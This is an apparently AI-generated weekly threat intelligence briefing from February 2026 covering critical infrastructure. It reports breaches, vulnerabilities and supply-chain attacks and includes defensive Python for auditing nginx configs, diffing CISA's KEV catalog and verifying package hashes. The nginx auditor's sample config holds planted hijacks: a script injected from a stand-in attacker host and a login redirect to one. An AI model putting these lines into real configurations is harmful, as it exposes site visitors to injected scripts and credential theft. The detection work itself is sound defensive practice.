
CISA Orders End-of-Life Edge Device Removal as New APT Breaches 37 Nations' Critical Infrastructure; Record 31.4 Tbps DDoS Attack Recorded

Critical Infrastructure Intelligence Briefing

Date: Friday, February 6, 2026

Reporting Period: January 30 – February 6, 2026


1. Executive Summary

This week's intelligence highlights significant developments across multiple critical infrastructure sectors, with immediate action required on several fronts:

  • CISA Issues Binding Operational Directive (BOD 26-02): Federal agencies must identify and remove end-of-life network edge devices, addressing a persistent attack vector exploited in major breaches. This directive has immediate implications for all critical infrastructure operators.
  • New APT Group Emerges with Global Reach: Security researchers have identified a previously unknown advanced persistent threat (APT) group that has successfully breached government and critical infrastructure organizations across 37 countries, demonstrating sophisticated capabilities and broad targeting.
  • Record-Breaking DDoS Attack: The AISURU/Kimwolf botnet launched a 31.4 Tbps DDoS attack—the largest ever recorded—signaling a significant escalation in volumetric attack capabilities that threatens availability of critical services.
  • Energy Sector Cybersecurity Legislation Advances: Five bills designed to strengthen energy sector cyber defenses cleared a House panel, following the Department of Energy's Liberty Eclipse cybersecurity exercise.
  • Supply Chain Compromise Alert: A counterfeit PLC discovered at a water utility and compromised npm/PyPI packages highlight ongoing supply chain risks requiring enhanced verification procedures.
  • Critical Vulnerabilities Under Active Exploitation: SmarterMail vulnerability being exploited in ransomware attacks; four new vulnerabilities disclosed in Ingress NGINX (the Kubernetes ingress controller); n8n workflow automation platform flaw enables system command execution.

Immediate Actions Required:

  1. Inventory all network edge devices and identify end-of-life equipment for replacement
  2. Verify authenticity of industrial control system components, particularly PLCs
  3. Patch SmarterMail installations immediately if in use
  4. Review NGINX configurations for signs of compromise
  5. Assess DDoS mitigation capabilities against volumetric attacks

2. Threat Landscape

Nation-State Threat Actor Activities

New APT Group Targets Global Critical Infrastructure

CSO Online reports that security researchers have identified a previously unknown APT group that has compromised government agencies and critical infrastructure organizations in 37 countries. The group demonstrates advanced capabilities including:

  • Sophisticated initial access techniques
  • Long-term persistence mechanisms
  • Cross-sector targeting indicating strategic intelligence collection objectives

Assessment: This represents a significant threat to critical infrastructure operators globally. Organizations should review indicators of compromise (IOCs) as they become available and enhance monitoring for anomalous network activity.

Source: CSO Online

Chinese Threat Actor Deploys 'DKnife' Implant

A Chinese threat actor has been utilizing the DKnife implant since at least 2019 to conduct adversary-in-the-middle (AitM) attacks. The malware targets:

  • Desktop systems
  • Mobile devices
  • IoT devices

While current reporting indicates targeting of Chinese users, the techniques and capabilities could be adapted for broader campaigns against critical infrastructure IoT deployments.

Source: SecurityWeek

Iranian Threat Group 'Infy' Resumes Operations

The Iranian threat group known as Infy (Prince of Persia) has resumed operations following Iran's internet blackout, deploying new command-and-control infrastructure and evolved tactics to evade detection. This group has historically targeted government and critical infrastructure entities.

Source: The Hacker News

Russian Cyber Operations Target Italy Pre-Olympics

Italian authorities have successfully defended against Russian hacker attacks targeting the country ahead of the Winter Olympics. This activity aligns with historical patterns of nation-state cyber operations surrounding major international events.

Source: CSO Online

Ransomware and Cybercriminal Developments

SmarterMail Vulnerability Exploited in Ransomware Attacks

A critical vulnerability in SmarterMail is being actively exploited by ransomware operators. The flaw allows unauthenticated attackers to execute arbitrary code remotely via malicious HTTP requests. Organizations using SmarterMail should:

  • Apply patches immediately
  • Monitor for indicators of compromise
  • Review email server logs for suspicious activity

Source: SecurityWeek

Ransomware Operators Abuse ISPsystem VMs

Ransomware groups are leveraging virtual machines provisioned through ISPsystem, a legitimate virtual infrastructure management provider, to host and deliver malicious payloads at scale. This technique provides:

  • Legitimate-appearing infrastructure
  • Rapid deployment capabilities
  • Difficulty in attribution and takedown

Source: Bleeping Computer

Buhlmann Group Ransomware Attack

German industrial company Buhlmann Group has been targeted by a ransomware attack, highlighting continued threats to manufacturing and industrial sectors.

Source: CSO Online

DDoS and Botnet Activity

Record-Setting 31.4 Tbps DDoS Attack

Cloudflare has attributed a record-breaking DDoS attack peaking at 31.4 terabits per second (Tbps) to the AISURU/Kimwolf botnet. Key details:

  • Attack duration: 35 seconds
  • Represents a significant escalation in volumetric attack capabilities
  • Attribution to the AISURU/Kimwolf botnet was made by Cloudflare

Implications for Critical Infrastructure: Traffic at this volume far exceeds what on-premises scrubbing appliances or a single organization's transit links can absorb; it can only be soaked up inside a large provider's anycast network. Critical infrastructure operators should:

  • Review DDoS mitigation contracts and capabilities
  • Ensure upstream provider relationships can handle volumetric attacks
  • Test incident response procedures for availability attacks

Source: The Hacker News

Supply Chain Threats

Compromised npm and PyPI Packages

Legitimate packages on npm and PyPI repositories have been compromised to distribute wallet stealers and RAT malware. The affected packages include those associated with dYdX, a decentralized exchange. This highlights:

  • Ongoing risks in software supply chains
  • Need for package verification and integrity monitoring
  • Importance of software bill of materials (SBOM) practices

Source: The Hacker News

Notepad++ Supply Chain Compromise

Hackers associated with the Chinese government utilized a Trojaned version of Notepad++ in a supply chain attack that persisted for approximately six months. This incident underscores the need for:

  • Software integrity verification
  • Monitoring of update mechanisms
  • Application allowlisting in critical environments

Source: Schneier on Security

Web Infrastructure Attacks

NGINX Server Compromise Campaign

An active campaign is compromising NGINX servers to hijack user traffic and reroute it through attacker-controlled infrastructure. The campaign targets:

  • NGINX installations
  • Baota (BT) management panels

Organizations should compare their running NGINX configuration (including every file pulled in via include directives) against a known-good baseline, look for unexpected proxy_pass targets, return/rewrite redirects to unfamiliar hosts, sub_filter directives that inject markup into responses, and load_module directives pointing at unfamiliar paths, and monitor for unexpected traffic patterns.

Source: The Hacker News, Bleeping Computer
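
The checks described above, as an added example for this briefing (not code from the campaign reporting or from NGINX): it tokenizes an nginx configuration, compares it against a recorded baseline hash, and flags directives that send user traffic somewhere unexpected. The sample configuration and the allow-list of expected upstream and redirect hosts are constructed for illustration; the heuristics (redirect to an unlisted host, script-injecting sub_filter, dynamic module loads, includes from outside /etc/nginx) are this example's assumptions about what a traffic hijack looks like in configuration, not indicators published for this campaign.

```python
"""Audit an nginx configuration for traffic-hijacking changes."""
from __future__ import annotations

import hashlib
import re

REDIRECT_CODES = {"301", "302", "303", "307", "308"}
# Host part of an absolute URL; stops at port, path, query, fragment or an nginx $variable.
_URL_HOST = re.compile(r"^[a-z][a-z0-9+.-]*://([^/:$?#]+)", re.I)


def strip_comments(text: str) -> str:
    # nginx comments start with '#' at line start or after whitespace.
    return re.sub(r"(?m)(^|\s)#.*$", r"\1", text)


def parse_directives(text: str) -> list[tuple[tuple[str, ...], str, list[str]]]:
    """Tokenize nginx syntax into (block context, directive name, arguments).

    Handles nested blocks and quoted arguments; enough for auditing, not a full parser.
    """
    tokens = re.findall(r'"[^"]*"|\'[^\']*\'|[{};]|[^\s{};"\']+', strip_comments(text))
    context: list[str] = []
    current: list[str] = []
    directives = []
    for tok in tokens:
        if tok == "{":
            context.append(" ".join(current))   # e.g. "location /login"
            current = []
        elif tok == "}":
            if context:
                context.pop()
        elif tok == ";":
            if current:
                directives.append((tuple(context), current[0], current[1:]))
            current = []
        else:
            current.append(tok.strip("\"'"))
    return directives


def host_of(url: str) -> str | None:
    """Lower-cased host of an absolute URL, or None for a relative target."""
    m = _URL_HOST.match(url)
    return m.group(1).lower() if m else None


def audit_config(text: str, allowed_hosts: set[str], baseline_sha256: str | None = None) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    findings: list[str] = []
    if baseline_sha256 is not None:
        actual = hashlib.sha256(text.encode()).hexdigest()
        if actual != baseline_sha256:
            findings.append(f"main: config hash {actual[:12]}... differs from baseline")
    for context, name, args in parse_directives(text):
        where = " > ".join(context) or "main"
        if name == "proxy_pass" and args:
            host = host_of(args[0])
            if host and host not in allowed_hosts:
                findings.append(f"{where}: proxy_pass to unexpected host {host}")
        elif name == "return" and len(args) >= 2 and args[0] in REDIRECT_CODES:
            host = host_of(args[1])
            if host and host not in allowed_hosts:
                findings.append(f"{where}: return {args[0]} redirects to unexpected host {host}")
        elif name == "rewrite" and len(args) >= 3 and args[-1] in {"redirect", "permanent"}:
            host = host_of(args[1])
            if host and host not in allowed_hosts:
                findings.append(f"{where}: rewrite redirects to unexpected host {host}")
        elif name == "sub_filter" and len(args) >= 2 and re.search(r"<\s*(script|iframe)", args[1], re.I):
            findings.append(f"{where}: sub_filter injects markup into responses: {args[1][:60]}")
        elif name == "load_module" and args:
            findings.append(f"{where}: dynamic module loaded from {args[0]}")
        elif name == "include" and args and args[0].startswith("/") and not args[0].startswith("/etc/nginx/"):
            findings.append(f"{where}: include from outside /etc/nginx: {args[0]}")
    return findings


# Constructed sample: a benign reverse proxy with two planted hijacks.
SAMPLE_CONFIG = """
events {}
http {
    include       mime.types;
    upstream app { server 127.0.0.1:8080; }
    server {
        listen 80;
        server_name www.example.com;
        location / {
            proxy_pass http://app;
            sub_filter '</body>' '<script src="https://cdn.evil.example/t.js"></script></body>';
            sub_filter_once on;
        }
        location /login {
            return 302 https://login.evil.example$request_uri;
        }
    }
}
"""
# Expected upstream names and redirect targets for this server (assumption, per deployment).
EXPECTED_HOSTS = {"app", "127.0.0.1", "www.example.com"}

if __name__ == "__main__":
    for finding in audit_config(SAMPLE_CONFIG, EXPECTED_HOSTS):
        print(finding)
```

Run it against the output of `nginx -T` (which prints the fully merged configuration, includes resolved) rather than against a single file, and record the baseline hash of that output after each legitimate change so the hash check stays meaningful.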

AI-Powered Law Firm Website Cloning Scam

Researchers have exposed a network of 150+ cloned law firm websites created using AI in a sophisticated scam campaign. The operation:

  • Uses AI to clone professional websites at industrial scale
  • Hides behind Cloudflare and rotating IP ranges
  • Demonstrates evolving criminal use of AI technologies

Source: SecurityWeek


3. Sector-Specific Analysis

Energy Sector

Congressional Action on Energy Cybersecurity

Five bills designed to boost energy sector cyber defenses have cleared a House panel. This legislative action follows the Department of Energy's annual Liberty Eclipse cybersecurity exercise, which tests the resilience of the nation's energy infrastructure against cyber threats.

Key Implications:

  • Potential new compliance requirements for energy sector entities
  • Increased federal resources for energy cybersecurity
  • Enhanced public-private coordination mechanisms

Source: SecurityWeek

Romanian Oil Pipeline Operator Cyberattack

Conpet, Romania's national oil pipeline operator, disclosed a cyberattack that:

  • Disrupted business systems
  • Took down the company's website
  • Occurred on Tuesday, February 3, 2026

This incident highlights the ongoing targeting of energy transportation infrastructure by threat actors.

Source: Bleeping Computer

Water & Wastewater Systems

CRITICAL: Counterfeit PLC Discovered in Water Utility

WaterISAC has issued an alert regarding the discovery of a counterfeit programmable logic controller (PLC) in a water utility. This represents a significant supply chain security concern:

Risks of Counterfeit PLCs:

  • Unknown firmware modifications or backdoors
  • Unreliable operation potentially affecting water treatment
  • Potential for remote access by malicious actors
  • Difficulty in detection without specialized verification

Recommended Actions:

  • Verify authenticity of all PLCs through authorized distributors
  • Document serial numbers and compare against manufacturer records
  • Implement procurement controls requiring verified supply chains
  • Consider firmware verification tools where available

Source: WaterISAC

Nation-State and Hacktivist Attacks on OT Infrastructure

WaterISAC has released analysis of recent significant nation-state and hacktivist cyber attacks on OT infrastructure, providing context for water sector operators on evolving threats to operational technology environments.

Source: WaterISAC

Communications & Information Technology

VS Code Configurations Expose GitHub Codespaces

Security researchers have shown that VS Code configuration files committed to a repository are processed automatically when a GitHub Codespace is created for that repository or pull request, so simply opening an untrusted repository in Codespaces can cause attacker-supplied commands to run in the developer's environment. This creates potential for:

  • Remote code execution attacks
  • Supply chain compromises through malicious repositories
  • Credential theft from development environments

Source: SecurityWeek

Substack Data Breach

Newsletter platform Substack has disclosed a security incident after a hacker leaked data including:

  • Nearly 700,000 user records
  • Email addresses
  • Phone numbers

The breach occurred in October 2025 but was disclosed this week.

Source: SecurityWeek, Bleeping Computer

Flickr Potential Data Breach

Photo-sharing platform Flickr is notifying users of a potential data breach through a third-party email service provider vulnerability, exposing:

  • Real names
  • Email addresses
  • IP addresses
  • Account information

Source: Bleeping Computer

Transportation Systems

TSA Rolls Out TSA ConfirmID

The Transportation Security Administration has successfully deployed TSA ConfirmID, enhancing identity verification capabilities at airport security checkpoints. This represents continued modernization of aviation security infrastructure.

Source: Homeland Security Today

Healthcare & Public Health

Healthcare Cybersecurity Crisis and Foundational Controls

New analysis of healthcare cyber losses indicates that foundational security controls remain the most effective at reducing risk in the healthcare sector. Key findings suggest:

  • Basic security hygiene prevents majority of successful attacks
  • Multi-factor authentication remains critical
  • Network segmentation significantly reduces breach impact
  • Regular patching addresses most exploited vulnerabilities

Source: Security Magazine

Financial Services

Betterment Data Breach Exposes 1.4 Million Accounts

Automated investment platform Betterment disclosed a data breach affecting 1.4 million accounts. Compromised data includes:

  • Email addresses
  • Personal information

The breach occurred in January 2026.

Source: Bleeping Computer

Government Facilities

Spain's Ministry of Science IT Shutdown

Spain's Ministry of Science announced a partial shutdown of IT systems following breach claims, affecting citizen- and company-facing services.

Source: Bleeping Computer

Italian University La Sapienza Cyberattack

Rome's La Sapienza university has been targeted by a cyberattack causing widespread operational disruptions to IT systems.

Source: Bleeping Computer


4. Vulnerability & Mitigation Updates

Critical Vulnerabilities Requiring Immediate Attention

Vulnerability                  Severity   Status                              Action Required
SmarterMail RCE                Critical   Actively exploited in ransomware    Patch immediately
n8n CVE-2026-25049             Critical   Disclosed                           Patch immediately
Ingress NGINX (4 new flaws)    High       Disclosed                           Review and patch
End-of-life edge devices       High       BOD 26-02 issued                    Inventory and replace

n8n Workflow Automation Platform (CVE-2026-25049)

A critical vulnerability in the n8n workflow automation platform enables execution of arbitrary system commands via malicious workflows. Organizations using n8n should:

  • Apply available patches immediately
  • Review existing workflows for suspicious content
  • Restrict workflow creation to authorized users

Source: The Hacker News

Ingress NGINX Vulnerabilities

Four new vulnerabilities have been discovered in Ingress NGINX, a widely-used Kubernetes ingress controller. Organizations should review their Kubernetes deployments and apply patches.

Source: CSO Online

BYOVD (Bring Your Own Vulnerable Driver) Attacks

Attackers are exploiting a decade-old Windows driver flaw to disable modern EDR defenses. This technique allows threat actors to:

  • Load vulnerable legitimate drivers
  • Exploit driver vulnerabilities to gain kernel access
  • Disable endpoint detection and response tools

Mitigation: Enforce Microsoft's recommended vulnerable driver blocklist (distributed as a WDAC policy and on by default where HVCI/memory integrity is enabled), keep it current, and alert on driver loads of blocklisted hashes, from unusual paths, or by processes that do not normally install drivers.

Source: CSO Online

CISA Advisories and Directives

BOD 26-02: End-of-Support Edge Device Mitigation

CISA has issued Binding Operational Directive 26-02 requiring federal agencies to:

  • Identify network edge devices that no longer receive security updates
  • Remove or replace end-of-life equipment
  • Implement compensating controls where immediate replacement is not possible

Applicability Beyond Federal Agencies: While binding only on federal civilian agencies, all critical infrastructure operators should adopt similar practices. Edge devices have been the initial access vector in numerous high-profile breaches.

Source: CyberScoop, Bleeping Computer, Homeland Security Today

CISA Vulnerability Scanning Testimonial Fact Sheet

CISA has released a new fact sheet highlighting the value of its vulnerability scanning services, including testimonials from organizations that have benefited from the free service.

Source: WaterISAC

CISA KEV Catalog Ransomware Updates

Concerns have been raised regarding CISA's practice of silently updating KEV (Known Exploited Vulnerabilities) catalog entries to indicate ransomware exploitation. In 2025, CISA updated 59 KEV entries to specify ransomware exploitation without prominent notification.

Recommendation: Organizations should regularly review the full KEV catalog, not just new additions, for updated exploitation context.

Source: SecurityWeek
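
One way to act on that recommendation, as an added example for this briefing (not CISA tooling): keep dated copies of the KEV JSON feed and diff consecutive copies, reporting not only new CVEs but existing entries whose knownRansomwareCampaignUse flag or other fields changed in place. The feed URL and the field names (cveID, knownRansomwareCampaignUse with values Known/Unknown) are those of the published catalog; the two snapshots below are constructed, with synthetic IDs that are not real CVEs.

```python
"""Diff two snapshots of CISA's KEV catalog, surfacing in-place changes."""
from __future__ import annotations

import json

KEV_FEED_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"
RANSOMWARE_FIELD = "knownRansomwareCampaignUse"


def load_snapshot(path: str) -> dict:
    """Load a saved copy of the feed (e.g. fetched daily and stored with the date in its name)."""
    with open(path, encoding="utf-8") as fh:
        return json.load(fh)


def index_by_cve(snapshot: dict) -> dict[str, dict]:
    return {entry["cveID"]: entry for entry in snapshot["vulnerabilities"]}


def diff_kev(previous: dict, current: dict) -> dict[str, list]:
    """Return added/removed CVEs, ransomware-flag flips, and other in-place edits.

    A flip shows up as (cveID, old value, new value); other edits as (cveID, changed fields).
    """
    before, after = index_by_cve(previous), index_by_cve(current)
    report: dict[str, list] = {
        "added": sorted(set(after) - set(before)),
        "removed": sorted(set(before) - set(after)),
        "ransomware_flipped": [],
        "other_changes": [],
    }
    for cve in sorted(set(before) & set(after)):
        old, new = before[cve], after[cve]
        if old.get(RANSOMWARE_FIELD) != new.get(RANSOMWARE_FIELD):
            report["ransomware_flipped"].append((cve, old.get(RANSOMWARE_FIELD), new.get(RANSOMWARE_FIELD)))
        changed = sorted(k for k in set(old) | set(new)
                         if k != RANSOMWARE_FIELD and old.get(k) != new.get(k))
        if changed:
            report["other_changes"].append((cve, changed))
    return report


# Constructed snapshots shaped like the feed; IDs are synthetic, not real CVEs.
SNAPSHOT_PREVIOUS = json.loads("""{"title": "KEV snapshot (constructed)", "vulnerabilities": [
  {"cveID": "CVE-1900-0001", "vendorProject": "ExampleVendor", "product": "Gateway",
   "dateAdded": "1900-01-01", "dueDate": "1900-01-22", "knownRansomwareCampaignUse": "Unknown", "notes": ""},
  {"cveID": "CVE-1900-0002", "vendorProject": "ExampleVendor", "product": "Mail",
   "dateAdded": "1900-01-02", "dueDate": "1900-01-23", "knownRansomwareCampaignUse": "Known", "notes": ""}
]}""")
SNAPSHOT_CURRENT = json.loads("""{"title": "KEV snapshot (constructed)", "vulnerabilities": [
  {"cveID": "CVE-1900-0001", "vendorProject": "ExampleVendor", "product": "Gateway",
   "dateAdded": "1900-01-01", "dueDate": "1900-01-22", "knownRansomwareCampaignUse": "Known", "notes": ""},
  {"cveID": "CVE-1900-0002", "vendorProject": "ExampleVendor", "product": "Mail",
   "dateAdded": "1900-01-02", "dueDate": "1900-01-23", "knownRansomwareCampaignUse": "Known",
   "notes": "Exploited by a ransomware affiliate; see vendor advisory."},
  {"cveID": "CVE-1900-0003", "vendorProject": "ExampleVendor", "product": "Edge Router",
   "dateAdded": "1900-01-03", "dueDate": "1900-01-24", "knownRansomwareCampaignUse": "Unknown", "notes": ""}
]}""")

if __name__ == "__main__":
    report = diff_kev(SNAPSHOT_PREVIOUS, SNAPSHOT_CURRENT)
    for cve, old, new in report["ransomware_flipped"]:
        print(f"{cve}: ransomware use {old} -> {new}")
    for cve in report["added"]:
        print(f"{cve}: newly added")
    for cve, fields in report["other_changes"]:
        print(f"{cve}: fields changed in place: {', '.join(fields)}")
```

The ransomware flips are the ones to route to the patch-priority queue: the CVE was already in the catalog, so a process that only watches for new entries never sees them.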

CISA ICS Advisories

CISA released its weekly compilation of ICS advisories, alerts, and bulletins on February 5, 2026. Critical infrastructure operators should review these for applicable systems.

Source: WaterISAC

AI-Discovered Vulnerabilities

Claude Opus 4.6 Identifies 500+ High-Severity Flaws

Anthropic's Claude Opus 4.6 AI model has identified more than 500 previously unknown high-severity security flaws across major open-source libraries. This demonstrates:

  • Growing capability of AI in vulnerability discovery
  • Potential for both defensive and offensive applications
  • Need for organizations to monitor for patches in open-source dependencies

Source: The Hacker News

Recommended Defensive Measures

  • Edge Device Security: Conduct comprehensive inventory of all network edge devices; prioritize replacement of end-of-life equipment
  • Supply Chain Verification: Implement procedures to verify authenticity of hardware components, particularly PLCs and other ICS equipment
  • Software Integrity: Monitor package repositories for compromised dependencies; implement SBOM practices
  • DDoS Preparedness: Review mitigation capabilities against volumetric attacks exceeding 30 Tbps
  • EDR Protection: Implement driver blocklists to prevent BYOVD attacks

5. Resilience & Continuity Planning

Lessons Learned from Recent Incidents

Energy Sector: Liberty Eclipse Exercise

The Department of Energy's Liberty Eclipse cybersecurity exercise has informed the development of five new legislative proposals for energy sector cyber defenses. Key takeaways likely include:

  • Need for enhanced information sharing mechanisms
  • Importance of cross-sector coordination
  • Value of regular exercise programs

Healthcare Sector: Foundational Controls Effectiveness

Analysis of healthcare cyber incidents confirms that basic security controls remain the most effective risk reduction measures:

  • Multi-factor authentication
  • Regular patching
  • Network segmentation
  • Employee security awareness training

Supply Chain Security Developments

Hardware Supply Chain Risks

The discovery of a counterfeit PLC at a water utility highlights critical supply chain vulnerabilities:

  • Procurement Controls: Establish relationships with authorized distributors only
  • Verification Procedures: Implement incoming inspection for critical components
  • Documentation: Maintain records of component provenance
  • Monitoring: Watch for anomalous behavior from installed equipment

Software Supply Chain Risks

Multiple incidents this week highlight software supply chain threats:

  • Compromised npm/PyPI packages
  • Trojaned Notepad++ distribution
  • Malicious VS Code configurations

Recommended Practices:

  • Implement software composition analysis (SCA) tools
  • Maintain software bills of materials (SBOMs)
  • Use package signing and verification
  • Monitor for security advisories on dependencies
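
What "package verification" means in practice for the two ecosystems named in the npm/PyPI item above and in the recommended practices here, as an added example for this briefing (not tooling from npm, pip or any affected project): npm's package-lock.json records each dependency's integrity as a Subresource Integrity string (sha512-<base64>), and pip requirement files pin with --hash=sha256:<hex>. Recomputing the digest of the artifact about to be installed and comparing it to the pin catches a re-published tarball whose contents changed, which is exactly how a hijacked legitimate package presents. Package names and artifact bytes below are constructed; the sha256 of the bytes "hello" is a known value used as a fixed pin.

```python
"""Verify package artifacts against the digests pinned in lockfiles (npm SRI, pip --hash)."""
from __future__ import annotations

import base64
import hashlib
import hmac
import re
from dataclasses import dataclass

SUPPORTED = ("sha256", "sha384", "sha512")


@dataclass(frozen=True)
class Pin:
    name: str
    algorithm: str
    digest: bytes  # raw digest bytes


def parse_sri(name: str, integrity: str) -> Pin:
    """npm 'integrity' value such as 'sha512-Yc4...=='. Only the first token is used if several are present."""
    tokens = integrity.split()
    algorithm, _, b64 = (tokens[0] if tokens else "").partition("-")
    if algorithm not in SUPPORTED or not b64:
        raise ValueError(f"{name}: unsupported integrity value {integrity!r}")
    digest = base64.b64decode(b64, validate=True)
    if len(digest) != hashlib.new(algorithm).digest_size:
        raise ValueError(f"{name}: digest length does not match {algorithm}")
    return Pin(name, algorithm, digest)


def parse_pip_hash(name: str, option: str) -> Pin:
    """pip pin as written in requirements.txt, e.g. '--hash=sha256:2cf2...'."""
    m = re.fullmatch(r"--hash=(sha256|sha384|sha512):([0-9a-fA-F]+)", option.strip())
    if not m:
        raise ValueError(f"{name}: malformed hash pin {option!r}")
    digest = bytes.fromhex(m.group(2))
    if len(digest) != hashlib.new(m.group(1)).digest_size:
        raise ValueError(f"{name}: digest length does not match {m.group(1)}")
    return Pin(name, m.group(1), digest)


def verify_artifact(pin: Pin, data: bytes) -> bool:
    """True only if the artifact bytes hash to the pinned digest (constant-time comparison)."""
    actual = hashlib.new(pin.algorithm, data).digest()
    return hmac.compare_digest(actual, pin.digest)


def make_sri(algorithm: str, data: bytes) -> str:
    """The SRI string a lockfile would record for data (used here only to build the sample)."""
    return f"{algorithm}-" + base64.b64encode(hashlib.new(algorithm, data).digest()).decode()


def audit(lock: dict[str, str], artifacts: dict[str, bytes]) -> list[str]:
    """Names of npm dependencies whose downloaded artifact is missing or fails its integrity pin."""
    failures = []
    for name, integrity in sorted(lock.items()):
        data = artifacts.get(name)
        if data is None or not verify_artifact(parse_sri(name, integrity), data):
            failures.append(name)
    return failures


# Constructed sample: stand-in tarball bytes and the lock entries recorded for them.
GOOD_TARBALL = b"hello"          # the bytes resolved at lock time
TAMPERED_TARBALL = b"hello\n"    # a re-published artifact whose contents differ
SAMPLE_LOCK = {
    "example-sdk": make_sri("sha512", GOOD_TARBALL),
    "example-utils": "sha256-LPJNul+wow4m6DsqxbninhsWHlwfp0JecwQzYpOLmCQ=",  # sha256(b"hello")
    "example-wallet-lib": make_sri("sha512", GOOD_TARBALL),
}
SAMPLE_ARTIFACTS = {
    "example-sdk": GOOD_TARBALL,
    "example-utils": GOOD_TARBALL,
    "example-wallet-lib": TAMPERED_TARBALL,   # same name and version, different bytes: must fail
}

if __name__ == "__main__":
    print("failed integrity pins:", audit(SAMPLE_LOCK, SAMPLE_ARTIFACTS))
```

The package managers already enforce these pins when told to: `npm ci` refuses an artifact whose integrity differs from package-lock.json, and `pip install --require-hashes -r requirements.txt` refuses any requirement without a matching hash. The value of an independent check like the one above is in CI gates and artifact mirrors, where you want the verdict before the install step runs anything.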

Cross-Sector Dependencies

This week's incidents illustrate interconnected risks:

  • Energy → All Sectors: Pipeline operator attacks can cascade to dependent industries
  • IT → All Sectors: Edge device vulnerabilities affect all sectors using network infrastructure
  • Financial → All Sectors: Fintech breaches can impact business operations across sectors

Public-Private Coordination

Operation Winter SHIELD

The FBI has released guidance on the most impactful cyber resilience actions organizations can take as part of Operation Winter SHIELD. This initiative provides prioritized recommendations for defensive measures.

Source: WaterISAC


6. Regulatory & Policy Developments

Federal Guidelines and Regulatory Changes

CISA BOD 26-02: Edge Device Security

The new binding operational directive establishes requirements for federal agencies regarding end-of-life network edge devices. While not directly binding on private sector entities, this directive:

  • Signals regulatory priorities
  • May influence future requirements for critical infrastructure
  • Provides a framework for voluntary adoption

U.S. Government Bans Foreign-Made UAS Purchases

The U.S. government has implemented a ban on purchasing foreign-made unmanned aircraft systems (UAS), with implications for:

  • Critical infrastructure operators using drones for inspection
  • Security operations utilizing aerial surveillance
  • Supply chain considerations for drone programs

Source: WaterISAC

Pending Legislation

Energy Sector Cybersecurity Bills

Five bills advancing through Congress address energy sector cyber defenses:

  • Enhanced information sharing requirements
  • Increased federal resources for sector security
  • Strengthened public-private partnerships

Energy sector entities should monitor these bills for potential compliance implications.

Source: SecurityWeek

International Developments

Italian Cyber Defense Operations

Italy's successful defense against Russian cyber operations ahead of the Winter Olympics demonstrates:

  • Effectiveness of proactive threat monitoring
  • Value of international intelligence sharing
  • Importance of event-based security planning

AI Governance

DOJ AI Use Cases Growth

The Department of Justice reports that AI use cases grew nearly 31% in 2025, indicating expanding government adoption of AI technologies. This has implications for:

  • AI security requirements
  • Governance frameworks
  • Potential regulatory models for critical infrastructure AI use


This briefing is generated using AI analysis of public news sources. Always verify critical information through authoritative sources before taking action.